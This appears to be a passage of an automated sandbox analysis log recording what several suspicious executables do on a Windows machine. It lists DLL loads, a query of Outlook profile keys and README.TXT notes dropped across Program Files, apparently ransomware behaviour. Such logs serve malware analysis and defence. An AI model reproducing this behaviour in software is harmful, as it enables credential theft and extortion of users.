                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: mozglue.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: vcruntime140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: msvcp140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: vcruntime140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: pcacli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: sfc_os.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Microsoft Office 15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Uninstall Information\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\7-Zip\Lang\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\7-Zip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXT
